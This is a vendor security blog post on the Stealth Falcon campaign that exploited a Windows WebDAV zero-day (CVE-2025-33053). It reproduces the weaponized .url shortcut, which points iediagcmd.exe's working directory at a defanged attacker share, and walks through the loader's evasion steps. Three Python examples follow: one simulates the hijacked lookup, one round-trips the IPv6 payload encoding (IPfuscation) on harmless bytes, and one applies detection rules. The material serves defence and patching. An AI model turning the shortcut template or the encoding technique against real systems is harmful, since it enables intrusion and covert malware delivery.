
Stealth Falcon’s WebDAV ZeroDay: How a Simple URL Dropped Dangerous Malware

June 23, 2025
Hackers exploited a Windows WebDAV zero-day (CVE-2025-33053) to drop malware via shortcut files. Learn how it works, and how to stay protected.

Every now and then, attackers find a clever way in. This time it was a zero-day in Windows' built-in WebDAV support. And it is serious: CVE-2025-33053 gave cyber spies a one-click path to run malware on a target system. Let's unpack what happened and why it matters.

What happened?

On June 10, 2025, Microsoft patched a zero-day flaw in its WebDAV client (CVE-2025-33053). Check Point Research had caught it being exploited in the wild by the APT group Stealth Falcon (also tracked as FruityArmor) against targets in the Middle East.

Stealth Falcon used a weaponized .url (Internet Shortcut) file. When a victim opened it, the legitimate Internet Explorer diagnostics tool, iediagcmd.exe, launched. That tool starts its helper utilities by bare file name, and because the shortcut had set the working directory to an attacker-controlled WebDAV server, it picked up a malicious copy of one of those helpers from the server instead of the real one.

Why WebDAV?

WebDAV extends HTTP with verbs for listing, reading and writing remote files. Windows ships a client for it, the WebClient service (the "WebDAV mini-redirector"), which lets a path such as \\host@SSL@443\DavWWWRoot\folder be used anywhere a UNC path is accepted, including as a process's working directory. That is where iediagcmd.exe comes in: it is a signed Windows binary that still ships with current Windows releases even though Internet Explorer itself was "retired", so it makes a trusted launcher.

The .url file looked like this:

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr

Setting the working directory to the WebDAV share is the whole trick. iediagcmd.exe starts its helper tools with a bare name such as route.exe, and when CreateProcess is given a name without a path it searches the application's own directory, then the current directory, and only then the system directories. The shortcut's WorkingDirectory became that current directory, so a rogue route.exe on the attacker's server was found and run before the real one in System32.
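To make the mechanism concrete, here is an added example (not code from the original post, from Check Point or from Vicarius) that parses the shortcut's fields, flags the abuse pattern, and replays the CreateProcess search order to show where route.exe comes from. The shortcut text and the directory listing are constructed for the demo; the two shortcut fields are the ones quoted above, with the domain kept defanged.

```python
"""Parse a .url (InternetShortcut) file, flag the WebDAV working-directory pattern,
and replay the CreateProcess search order that hands iediagcmd.exe a rogue route.exe.
Added example; the shortcut and the directory listing below are constructed."""
import configparser
import ntpath

# Constructed sample shortcut: the same two fields the article shows (domain defanged).
SAMPLE_URL_FILE = """[InternetShortcut]
URL=C:\\Program Files\\Internet Explorer\\iediagcmd.exe
WorkingDirectory=\\\\summerartcamp[.]net@ssl@443/DavWWWRoot\\OSYxaOjr
"""


def norm(p: str) -> str:
    """Normalise a Windows path for comparison: forward slashes to backslashes, case-folded."""
    return p.replace("/", "\\").rstrip("\\").lower()


def is_remote_path(p: str) -> bool:
    """True for UNC paths, including the mini-redirector form \\\\host@ssl@443\\DavWWWRoot\\..."""
    return norm(p).startswith("\\\\")


def parse_internet_shortcut(text: str) -> dict:
    """Return the key/value pairs of the [InternetShortcut] section, keys kept as written."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str
    cp.read_string(text)
    return dict(cp["InternetShortcut"])


def assess_shortcut(fields: dict) -> list:
    """Heuristics for the pattern in the article: a local executable as the target
    plus a remote (UNC/WebDAV) working directory."""
    findings = []
    url = fields.get("URL", "")
    wd = fields.get("WorkingDirectory", "")
    if not url.lower().startswith(("http://", "https://")) and \
            ntpath.splitext(url)[1].lower() in (".exe", ".cmd", ".bat"):
        findings.append("URL field launches a local executable instead of a web address")
    if ntpath.basename(url).lower() == "iediagcmd.exe":
        findings.append("target is iediagcmd.exe, which starts helper tools by bare name")
    if is_remote_path(wd):
        findings.append("WorkingDirectory is a remote UNC/WebDAV path")
    if "@ssl@" in wd.lower() or "davwwwroot" in wd.lower():
        findings.append("WorkingDirectory uses WebDAV mini-redirector syntax")
    return findings


def resolve_like_createprocess(name: str, app_dir: str, cwd: str, system_dirs, listing: dict):
    """Search order CreateProcess uses for an image name with no path (per Microsoft docs):
    the application's directory, the current directory, then the system directories.
    `listing` maps a directory to its file names and stands in for the real file system."""
    table = {norm(d): {f.lower() for f in files} for d, files in listing.items()}
    for d in [app_dir, cwd, *system_dirs]:
        if name.lower() in table.get(norm(d), set()):
            return ntpath.join(d.replace("/", "\\"), name)
    return None


# Constructed listing: the attacker's share holds its own route.exe.
IE_DIR = r"C:\Program Files\Internet Explorer"
SYSTEM_DIRS = [r"C:\Windows\System32", r"C:\Windows"]
WEBDAV_DIR = r"\\summerartcamp[.]net@ssl@443\DavWWWRoot\OSYxaOjr"
CONSTRUCTED_FS = {
    IE_DIR: {"iediagcmd.exe", "iexplore.exe"},
    r"C:\Windows\System32": {"route.exe", "ipconfig.exe", "netsh.exe"},
    WEBDAV_DIR: {"route.exe"},
}


def route_exe_resolution(fields: dict):
    """Where route.exe comes from when iediagcmd.exe runs with the shortcut's working directory."""
    return resolve_like_createprocess("route.exe", IE_DIR, fields["WorkingDirectory"],
                                      SYSTEM_DIRS, CONSTRUCTED_FS)


if __name__ == "__main__":
    fields = parse_internet_shortcut(SAMPLE_URL_FILE)
    for finding in assess_shortcut(fields):
        print("[!]", finding)
    print("route.exe with the shortcut's cwd :", route_exe_resolution(fields))
    print("route.exe with a local cwd        :", resolve_like_createprocess(
        "route.exe", IE_DIR, r"C:\Users\victim", SYSTEM_DIRS, CONSTRUCTED_FS))
```

Swap the working directory for a local folder and the same lookup lands on C:\Windows\System32\route.exe, which is exactly why the WorkingDirectory field is the thing to hunt for in shortcut files.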

The infection chain

Once iediagcmd.exe launched route.exe from the attacker's server, the real trouble began. Here is the chain:

  1. Horus Loader: A C++ loader heavily obfuscated with Code Virtualizer to resist reverse engineering.
  2. Anti-analysis: The loader manually mapped the DLLs it needed (sidestepping the hooks security products place in the normally loaded copies) and checked the running processes for security tools, stopping if defenses were present.
  3. Decoy PDF: A decoy document was decrypted in memory, written to %temp% and opened, so the user saw a plausible PDF while the loader kept working in the background.
  4. IPfuscation: The real payload was stored as a list of IPv6 address strings and converted back into shellcode bytes in memory, so no recognisable shellcode sits in the file.
  5. Process injection: A browser process (msedge.exe) was created in a suspended state, the payload was injected into it, and the thread was resumed.

That final payload was the Horus Agent, a custom implant built on the Mythic C2 framework. It could:

  • Fingerprint the system
  • Inject shellcode
  • List files
  • Exfiltrate data
  • Talk to a remote C2 server

Stealth Falcon used it cautiously, deploying further stages only when the victim looked worth the effort.
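Step 4 of the chain, IPfuscation, is easier to reason about with a working encoder, decoder and the heuristic a defender can run against a strings dump. The block below is an added example, not the malware's own code and not from Vicarius or Check Point: the "payload" is a constructed, harmless byte string, and the decoder uses Python's ipaddress module where a Windows loader would call an API such as RtlIpv6StringToAddress.

```python
"""IPfuscation round trip plus a detection heuristic.
Added example; DEMO_PAYLOAD and STRINGS_DUMP are constructed for the demo."""
import ipaddress

# Constructed stand-in for shellcode: 68 meaningless bytes, just something to round-trip.
DEMO_PAYLOAD = bytes(range(0x90, 0xD0)) + b"demo"


def ipfuscate(data: bytes) -> list:
    """Encode bytes as IPv6 literals, 16 bytes per address, zero-padded at the end."""
    padded = data + b"\x00" * (-len(data) % 16)
    return [str(ipaddress.IPv6Address(padded[i:i + 16])) for i in range(0, len(padded), 16)]


def deipfuscate(addresses, length: int) -> bytes:
    """Reverse of ipfuscate(): parse each literal back to its 16 packed bytes, trim padding."""
    raw = b"".join(ipaddress.IPv6Address(a).packed for a in addresses)
    return raw[:length]


def ipv6_runs(tokens, min_run: int = 4) -> list:
    """Return runs of at least min_run consecutive tokens that parse as IPv6 addresses.
    Ordinary binaries rarely carry long arrays of full IPv6 literals; a loader that
    stores its payload this way does."""
    runs, current = [], []
    for tok in tokens:
        try:
            ipaddress.IPv6Address(tok)
        except ValueError:
            if len(current) >= min_run:
                runs.append(current)
            current = []
            continue
        current.append(tok)
    if len(current) >= min_run:
        runs.append(current)
    return runs


# Constructed "strings" output of a hypothetical loader: ordinary imports and URLs
# surrounding the encoded payload.
STRINGS_DUMP = "\n".join(
    ["kernel32.dll", "VirtualAlloc", "https://update.example.invalid/check"]
    + ipfuscate(DEMO_PAYLOAD)
    + ["Mozilla/5.0", "%TEMP%\\brochure.pdf"]
)


def scan_for_ipfuscation(text: str, min_run: int = 4) -> list:
    """Tokenise on whitespace; report each suspicious run with the byte count it hides."""
    return [(run, len(run) * 16) for run in ipv6_runs(text.split(), min_run)]


if __name__ == "__main__":
    encoded = ipfuscate(DEMO_PAYLOAD)
    print(f"{len(DEMO_PAYLOAD)} bytes became {len(encoded)} IPv6 literals, e.g. {encoded[0]}")
    assert deipfuscate(encoded, len(DEMO_PAYLOAD)) == DEMO_PAYLOAD
    for run, nbytes in scan_for_ipfuscation(STRINGS_DUMP):
        print(f"suspicious run of {len(run)} IPv6 literals ({nbytes} bytes of hidden data)")
```

The heuristic is deliberately simple: it needs the literals to be contiguous and at least min_run long, so tune min_run against your own binaries before treating a hit as more than a lead.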

The threat landscape

This is more than a lab exercise. CISA added CVE-2025-33053 to its Known Exploited Vulnerabilities catalog, and Microsoft shipped fixes not only for current Windows releases but also for out-of-support systems such as Windows Server 2012 and Windows 8, a sign of how seriously it was taken.

Kaspersky called it one of the most dangerous bugs of the June 2025 Patch Tuesday: a CVSS score of 8.8 combined with confirmed in-the-wild exploitation makes it a top patch priority.

It is tied to espionage against targets in Turkey, Qatar, Egypt and Yemen, possibly including military and government systems. Dark Reading emphasized the one-click nature: open the .url file and the attacker is in.

Why it worked

Several conditions made this exploit powerful:

  • Trusted tools: Attackers piggy-backed on a legitimate, signed Windows utility.
  • Remote executable loading: The WebDAV working directory let them substitute their own binary for a system tool without touching anything under System32.
  • One-click delivery: A phishing email with a .url attachment was enough.
  • Complex loaders and evasion: Obfuscation, encrypted payloads, IPfuscation and process injection kept the code hidden.

Stealth Falcon showed both sophistication and restraint, deploying the full backdoor only when it was needed.

What users and admins should do

  1. Patch immediately. Microsoft's June 2025 update covers the flaw, including on older systems.
  2. Disrupt WebDAV until you patch: disable the WebClient service (Microsoft's recommended mitigation) or block outbound WebDAV to untrusted hosts at the proxy or firewall. WebDAV rides on ordinary HTTP/HTTPS, so a blanket block on ports 80/443 is not a realistic option.
  3. Use security tools that detect abnormal DLL or executable loads, suspicious working directories, and injection behaviour.
  4. Train staff: don't open unexpected .url attachments.
  5. Watch for anomalies: new processes launched from %temp%, executables or DLLs loaded from UNC or WebDAV paths, and unexpected outbound WebDAV connections.
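Items 3 and 5 above translate into a handful of process-creation rules. The block below is an added example, not the Vicarius script and not code from the original post: it runs those rules over constructed Sysmon Event ID 1 style records exported as JSON lines. Every record is made up for the demo; the WebDAV host is the defanged one quoted earlier in the article.

```python
"""Hunting rules for iediagcmd.exe / WebDAV abuse over constructed process-creation records.
Added example; SAMPLE_EVENTS is made up for the demo."""
import json
import ntpath
import re

# Constructed JSON-lines export (Sysmon Event ID 1 fields). Lines 3, 4 and 6 should fire.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Program Files\\Internet Explorer\\iediagcmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CurrentDirectory": "C:\\Users\\alice\\Documents"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\route.exe", "ParentImage": "C:\\Program Files\\Internet Explorer\\iediagcmd.exe", "CurrentDirectory": "C:\\Users\\alice\\Documents"}
{"EventID": 1, "Image": "C:\\Program Files\\Internet Explorer\\iediagcmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CurrentDirectory": "\\\\summerartcamp[.]net@ssl@443\\DavWWWRoot\\OSYxaOjr"}
{"EventID": 1, "Image": "\\\\summerartcamp[.]net@ssl@443\\DavWWWRoot\\OSYxaOjr\\route.exe", "ParentImage": "C:\\Program Files\\Internet Explorer\\iediagcmd.exe", "CurrentDirectory": "\\\\summerartcamp[.]net@ssl@443\\DavWWWRoot\\OSYxaOjr"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\ipconfig.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CurrentDirectory": "C:\\Users\\alice"}
{"EventID": 1, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\setup_tmp.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CurrentDirectory": "C:\\Users\\alice\\Downloads"}
""".strip()

# Mini-redirector spellings: \\host@SSL@443\DavWWWRoot\..., \\host@80\DavWWWRoot\...
WEBDAV_MARKERS = re.compile(r"davwwwroot|@ssl@|@\d+\\", re.IGNORECASE)
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def win_norm(p: str) -> str:
    return p.replace("/", "\\").lower()


def is_remote(p: str) -> bool:
    """UNC path, which is also how the WebClient service exposes a WebDAV share."""
    return win_norm(p).startswith("\\\\")


def is_webdav(p: str) -> bool:
    return is_remote(p) and WEBDAV_MARKERS.search(p) is not None


def evaluate(ev: dict) -> list:
    """Return the names of every rule a single process-creation record trips."""
    image = ev.get("Image", "")
    parent = ev.get("ParentImage", "")
    cwd = ev.get("CurrentDirectory", "")
    hits = []
    if ntpath.basename(image).lower() == "iediagcmd.exe" and is_remote(cwd):
        hits.append("iediagcmd.exe started with a remote working directory")
    if ntpath.basename(parent).lower() == "iediagcmd.exe" and is_remote(image):
        hits.append("iediagcmd.exe launched a helper from a remote share")
    if is_webdav(image):
        hits.append("process image lives on a WebDAV path")
    if any(m in win_norm(image) for m in TEMP_MARKERS):
        hits.append("process launched from a temp directory")
    return hits


def hunt(jsonl: str) -> dict:
    """Map 1-based line number -> rule hits, for the lines that trip at least one rule."""
    results = {}
    for n, line in enumerate(jsonl.splitlines(), 1):
        if not line.strip():
            continue
        hits = evaluate(json.loads(line))
        if hits:
            results[n] = hits
    return results


if __name__ == "__main__":
    for n, hits in hunt(SAMPLE_EVENTS).items():
        print(f"line {n}: " + "; ".join(hits))
```

The first two rules are specific to this technique and should be near-zero-noise in most estates; the temp-directory rule is a generic hygiene check that will need an allow-list for legitimate installers.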

How Vicarius helps

This is where Vicarius steps in. Our team released a detection script tailored for CVE-2025-33053. It hunts for signs of WebDAV misuse, such as shortcut files with remote working directories or iediagcmd.exe spawning helpers from remote folders.

With Vicarius you can:

  • Detect early: The script picks up attempts to exploit the vulnerability.
  • Block exploitation attempts: It watches for trusted helpers being tricked into loading malware.
  • Automate prevention: Rules can disable risky services such as WebClient automatically.
  • Speed up response: Alerts fire when indicators appear, so you can act fast.

We offer these scripts through our vSociety community, where both the detection script and the mitigation script are available. Users can plug them in and harden systems before attackers strike again.

It doesn’t take a complex exploit to cause serious damage. Sometimes, it’s just a misused shortcut file and a forgotten protocol. This attack is a reminder that even trusted tools and legacy services can become liabilities.

If you’re not already watching for these paths, now’s the time to start. Vicarius makes that easier with tools that detect the unusual before it becomes dangerous, and with automation that cuts off risks before they spread.

Because staying ahead of attackers isn’t about chasing every alert. It’s about fixing the ones that matter.

Sagy Kratu

Sr. Product Marketing Manager
